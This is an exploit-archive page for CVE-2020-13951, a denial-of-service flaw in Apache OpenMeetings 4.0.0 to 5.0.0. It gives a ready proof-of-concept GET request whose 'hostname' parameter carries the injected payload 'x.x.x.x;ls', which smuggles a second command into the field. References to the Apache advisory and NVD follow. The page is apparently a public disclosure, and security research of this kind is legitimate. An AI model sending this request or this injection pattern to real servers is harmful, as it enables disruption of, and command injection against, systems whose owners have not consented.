Apache OpenMeetings 5.0.0 - 'hostname' Denial of Service

CVE: 2020-13951

Platform: Multiple

Date: 2020-11-24

# Exploit Title: Apache OpenMeetings 5.0.0 - 'hostname' Denial of Service
# Google Dork: "Apache OpenMeetings DOS"
# Date: 2020-08-28
# Exploit Author: SunCSR (ThienNV - Sun* Cyber Security Research)
# Vendor Homepage: https://openmeetings.apache.org/
# Software Link: https://openmeetings.apache.org/
# Version: 4.0.0 - 5.0.0
# Tested on: Windows
# CVE: CVE-2020-13951

- POC:
# Vulnerability variable: hostname
# Payload: x.x.x.x;ls
# Request exploit:

GET /openmeetings/wicket/bookmarkable/org.apache.openmeetings.web.pages.HashPage?3-1.0-panel~main&app=network&navigatorAppName=Netscape&navigatorAppVersion=5.0 (Windows)&navigatorAppCodeName=Mozilla&navigatorCookieEnabled=true&navigatorJavaEnabled=false&navigatorLanguage=en-US&navigatorPlatform=Win32&navigatorUserAgent=Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0&screenWidth=1920&screenHeight=1080&screenColorDepth=24&jsTimeZone=Asia/Ho_Chi_Minh&utcOffset=7&utcDSTOffset=7&browserWidth=1920&browserHeight=966&hostname=x.x.x.x;ls&codebase=https://x.x.x.x:5443/openmeetings/hash&settings=[object Object]&_=1597801817026

- Reference: 
https://lists.apache.org/thread.html/re2aed827cd24ae73cbc320e5808020c8d12c7b687ee861b27d728bbc%40%3Cuser.openmeetings.apache.org%3E
https://nvd.nist.gov/vuln/detail/CVE-2020-13951

Bookmark

ClosePlease login

Share the word, let's increase Cybersecurity Awareness as we know it

- Sponsored -

Apache OpenMeetings 5.0.0 – ‘hostname’ Denial of Service

CVE: 2020-13951

Platform: Multiple

Date: 2020-11-24

Please login to bookmark

Sponsored Offer

Discover more infosec

more infosec reads

Subscribe for weekly updates

explore

Editor Picks

Featured

Cyber Academy

ABOUT US

Social

Subscribe for weekly updates

Add RiSec to your Homescreen?